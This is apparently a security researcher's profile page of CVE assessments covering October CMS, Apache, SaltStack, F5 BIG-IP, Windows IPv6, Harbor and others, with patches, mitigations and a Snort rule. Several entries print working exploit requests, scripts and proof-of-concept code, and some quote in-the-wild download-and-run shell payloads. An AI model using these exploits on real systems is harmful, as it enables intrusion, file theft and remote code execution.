kevthehermit (138)
Last Login: June 03, 2024
kevthehermit's Latest (20) Contributions
Technical Analysis
This is a simple Type Confusion / Juggling vulnerability.
October CMS will check to see if the User Supplied reset code matches the value in the database return ($this->reset_password_code == $resetCode);
If we can send a boolean value in place of a reset code we can bypass this check.
Laravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.
To exploit this vulnerability we simply need to set the Content-Type
to JSON and structure our POST request accordingly. An example POST is shown below.
POST /backend/backend/auth/reset/1/[] HTTP/1.1 Host: Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9 Connection: close {"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
In the Wild
This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites –
A proof of concept python script that will attempt to reset the password for the admin account has been published –
An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.
Applying the patches will successfully mitigate against this attack.
There is now RCE for this if mod-cgi
is enabled
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" '' -vv
CID=`docker run -d -p 8081:80 $(echo -e 'FROM httpd:2.4.49\nRUN sed -i -E "s|all denied|all granted|g; s|#(.* cgid_.*)|\1|g" /usr/local/apache2/conf/httpd.conf' | docker build -q -)` && curl 'localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' && docker kill $CID
Technical Analysis
This was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to SYSTEM
on vulnerable services
Exploit Code
There are several functional exploits available on Github after the initial repository was removed by the authors.
- – A windows binary exploit
- – Python3 using a modified version of impacket
Initial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.
Disable the print spooler can prevent exploitation.
Event logs can be found for both successful and non-successful exploit attempts in some situations.
Sigma rules can be found:
Technical Analysis
The D-LInk DCS-2530L is an IP Camera. This means it is more likely to be a target for botnets / IoT auto exploitation rather than anything else.
Triggering the exploit is very simple its just a GET
request to the /config/getuser?index=0"
endpoint and it returns the user|password combinations in clear text.
This can be paired with a second vulnerability reported at the same time, an authenticated command injection vuln, to gain access. See the exploited section below for more details.
The original tweets have been deleted but has them
In the wild.
My honeypots picked up a couple of pings on this, I am assuming automated scanning by some botnets.
{ "http_headers": { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "REDACTED:8080", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" }, "http_host": "REDACTED:8080", "http_method": "GET", "http_path": "/config/getuser", "http_post": {}, "http_query": "/config/getuser?index=0", "http_remote": "", "http_scheme": "http", "http_version": "HTTP/1.1", "src_ip": "" }
Technical Analysis
This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async
client no checks are made to verify the requester is authenticated.
Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.
This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.
a very simple example
import requests response = '', verify=False, json={ 'eauth': 'auto', 'client': 'wheel_async', 'fun': 'pillar_roots.write', 'data': '{{ salt[""]("id > /tmp/whoami") }}', 'path': '../../../../../../srv/salt/pwn.sls', }, ) if json := response.json(): print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')
You can edit the salt master configuration variables which include the ability to set the auth_mode
and sharedsecrets
if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.
You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd
or writing ssh-keys to /root/.ssh/id_rsa
POC available at
The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async
functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.
More details can be found in this article –
Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
Technical Analysis
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata –
Snort –
Zeek –
Microsoft Advisory –
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC –
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
Proof Of Concept
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import * def trigger(target_addr): ip = IPv6(dst = target_addr) ra = ICMPv6ND_RA() rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030", "3131:3131:3131:3131:3131:3131:3131:3131"]) # We put an even value for the option length (original length was 5) rdnss.len = len(rdnss.dns) * 2 truncated = bytes(rdnss)[: (rdnss.len-1) * 8] # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option # We build a Route Information Option here # # Second byte (0x22) is the Length. This controls the size of the buffer overflow # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer) routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84' # the value that overwrites the return address is taken from here correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141", "4242:4242:4242:4242:4242:4242:4242:4242"]) crafted = truncated + routeinfo FH=IPv6ExtHdrFragment() ip.hlim = 255 packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct #send(packet) #return frags=fragment6(packet, 100) print("len of packet: %d | number of frags: %d" % (len(packet), len(frags))) for frag in frags: send(frag, verbose=False) target_addr = "fe80::3935:5625:ea02:25c9" trigger(target_addr)
I was reading the wrong lua script this is related to 16899. Leaving here for those who got the notification and found it blank.
I am also “playing” with this and I noted that the McAfee article says Type 25 with an even length applied.
However If you read the lua dissector it actually says Type 31 –
And Length must be greater than 35 which we can do using the ListField in the DNSSL Option.
Either the write up is wrong or the lua script is looking at the wrong options.
Technical Analysis
BIG-IP platforms with Cavium Nitrox SSL hardware acceleration cards, a virtual server configured with a Client SSL profile, and using Anonymous Diffie-Hellman (ADH) or Ephemeral Diffie-Hellman (DHE) key exchange and Single DH use option not enabled in the options list may be vulnerable to crafted SSL/Transport Layer Security (TLS) handshakes that may result with a pre-master secret (PMS) that starts in a 0 byte and may lead to a recovery of plaintext messages as BIG-IP TLS/SSL ADH/DHE sends different error messages acting as an oracle. Differences in processing time when the PMS starts with 0 byte coupled with very precise timing measurement observation may also expose this vulnerability.
Thats a lot to take in …
A recent research study identified a timing attack against TLS that could be used to recover a shared secret that could then be used to recover plaintext of previously captured data.
In order to be successful outside of a testing environment, an attacker would need to intercept encrypted traffic and then send specially crafted TLS packets to a vulnerable server in the hopes of recovering enough data to decrypt the previously intercepted traffic.
This vulnerability affects BIG-IP systems with virtual servers associated with a Client SSL profile under the following conditions:
You are using ADH or DHE key exchange in the Client SSL profile.
- Note: DHE is enabled by default in the DEFAULT cipher suite. ADH is not available in the DEFAULT cipher suite.
- Note: DHE is enabled by default in the DEFAULT cipher suite. ADH is not available in the DEFAULT cipher suite.
You have not enabled the Single Diffie-Hellman use option—or Single DH use option—in the Client SSL profile.
- Note: The Single DH use option is not enabled by default in the Client SSL profile options list.
- Note: The Single DH use option is not enabled by default in the Client SSL profile options list.
Your BIG-IP platform has a Cavium Nitrox SSL hardware acceleration card installed. Platforms with this installed include:
- BIG-IP i11400-DS, i11600-DS, i11800-DS
- BIG-IP 1600, 3600, 3900, 5000, 6900, 7000, 8900, 10000, 11000, 12000
- VIPRION 2100, 2150, 2250, 4100, 4200, 4300
- BIG-IP i11400-DS, i11600-DS, i11800-DS
F5 have released a set of mitigations that will prevent this attack on vulnerable server until they can be patched.
- Log in to the Configuration utility.
- Go to Local Traffic > Profiles > SSL > Client.
- Select the Client SSL profile.
- In the Configuration list, select Advanced.
- In the Options section, in the list, select Options List.
- In the Options List section, under Available Options, select Single DH use, and then select Enable.
- The Single DH Use option displays under Enabled Options.
- In Ciphers, in the text box, enter a cipher string that disables ADH or DHE, such as the following example:
- In Unclean Shutdown, select Enabled.
- At the bottom of the page, select Update.
Technical Analysis
This is still a provisional assessment pending more research.
A high severity issue has been discovered in Citrix StoreFront that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.
This CVE is for Citrix StoreFront that allows an authenticated user to gain arbitrary file read on to the StoreFront server. This could lead to further compromise depending on the ability to exploit data recovered from the server.
The official statement from Citrix can be found here.
Updates are availaible
- Citrix StoreFront 1912 CU1 (1912.0.1000) and later versions of Citrix StoreFront 1912 LTSR
- Citrix StoreFront 3.0 for 7.6 LTSR CU8 Hotfix (3.0.8001) and later versions of StoreFront 3.0 for 7.6 LTSR
- Citrix StoreFront 3.12 for 7.15 LTSR CU5 Hotfix (3.12.5001) and later versions of StoreFront 3.12 for 7.15 LTSR
The advisory states that attackers must be authenticated in the same Microsoft Active Directory domain as the StoreFront server, if not this vulnerability is not exploitable.
This significantly impacts the ability for an attacker to exploit this vulnerability. An attacker would have to be:
- An insider threat with technical knowledge
- An attacker that already has authenticated access to the domain
Technical Analysis
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patch & Mitigation
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. –
Cloud Services
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
- At the time of Writing AWS MarketPlace version is
In the wild POC
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
Core Vulnerability.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
- File read
- File Write
- tmsh access
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' {"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' {"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Technical Analysis
Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.
If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.
- The helpdesk module is not enabled by default.
- A valid authenticated account with permissions to access /tickets
This doesn’t not appear to be patched in the latest release, although it has been acknowledged
It is fairly easy to create a functional POC against this target if the feature is enabled.
Modify the following POC to fit your needs.
import pickle import base64 import os class RCE: def __reduce__(self): cmd = ('curl') return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) print(base64.urlsafe_b64encode(pickled))
Technical Analysis
The use of unserialize in PHP that accepts user data. There is no sequence of code that can be exploited to gain code execution using this method.
Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.
If the base PHP version that is running this application also happens to be a version of PHP vulnerable to Then there is an increased possibility of gaining code execution using this methodology.
At the time of release, there is no official patch although third party patches have been made available here
Technical Analysis
The use of unserialize in PHP that accepts user data. There is no sequence of code that can be exploited to gain code execution using this method.
Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.
If the base PHP version that is running this application also happens to be a version of PHP vulnerable to Then there is an increased possibility of gaining code execution using this methodology.
At the time of release, there is no official patch although third party patches have been made available here
Technical Analysis
This one has a name and a website. –
There is also a github repository that has PoC code, this code will scan your local IP range to determine if you have vulnerable devices. Be aware this POC will send data about your network out to a 3rd party. It claims to encrypt this data, but I have not reviewed the implementation.
It may not have a list of internal UPNP Devices, but it will have a record of your IP, how much data was sent.
Root Cause
A Callback header that can be controlled by the attacker in the UPnP SUBSCRIBE
functionality can lead to SSRF-Like behaviour
This seems to be the obvious one that will get picked up by most botnet operators at some point.
Don’t expect this to be a likely threat, there are easier ways to bypass outgoing DLP restrictions than this.
Needs more review but Scanning internal ports from Internet-facing UPnP devices
could be useful, depending on what data is returned.
As Public PoCs are now out. I am sharing mine here. as well.
Active exploits in the wild have now been observed.
Payload is a CryptoMiner.
Base Command "(curl -s||wget -q -O-|sh"
Miner Download –
Technical Analysis
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506
exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
Proof Of Concept
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here –
The POC and others I am sure will appear shortly has the following functionality
- Read the root key
- Read and Write files on the Salt Master
- Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog –
Patch to the latest versions and do not expose theses ports to the external network.
examine /var/cache/salt/master/jobs/
on the salt master for a listing of all jobs. the return.p
file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files –
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p ��return��fun��jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0::::: bin:!::0::::: daemon:!::0::::: adm:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: operator:!::0::::: man:!::0::::: postmaster:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: at:!::0::::: squid:!::0::::: xfs:!::0::::: games:!::0::::: postgres:!::0::::: cyrus:!::0::::: vpopmail:!::0::::: ntp:!::0::::: smmsp:!::0::::: guest:!::0::::: nobody:!::0::::: salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
In the wild
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
The following Payloads have been observed
(curl -s||wget -q -O-|sh
import subprocess;\"(curl -s||wget -q -O-|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive || curl -fs --connect-timeout 5 -m10 --retry 3|sh -s -- G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s||wget -q -O-|sh
(curl -s||wget -q -O-|sh
(curl -s||wget -q -O-|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive[redacted_ip]
Technical Analysis
There are a lot of moving parts to be able to exploit this. But if successful will give an attacker a container escape on to the kube host.
An attacker must already have shell access to a container and there must be a process running from the host that uses the kubectl cp command.
This is occasionally seen used to copy files like log files out of a container to the host for backup or additional processing.
If a user can replace the tar binary in the container it is possible to perform actions like editing the .bashrc file on the host. This could be used to create new SSH accounts, or establish a reverse shell as that user. Typically with root permissions.
Technical Analysis
There are three specific requirements for an application to be vulnerable:
- Vulnerable version !
- Using a Database for storage
- Self Registration enabled.
Self-registration is not a very common setting but it has been seen.
If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.
POST /api/users HTTP/1.1 Host: Content-Type: application/json Content-Length: 95 Connection: close {"username":"Tom","email":"Tom@demo.local","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}
If you have access to the repository as an admin you can manipulate the containers and even gain further access in to the network if you can read and or modify any of the cotanienrs or their secrets.
Think this is the wrong CVE POC
Correct one seems to be –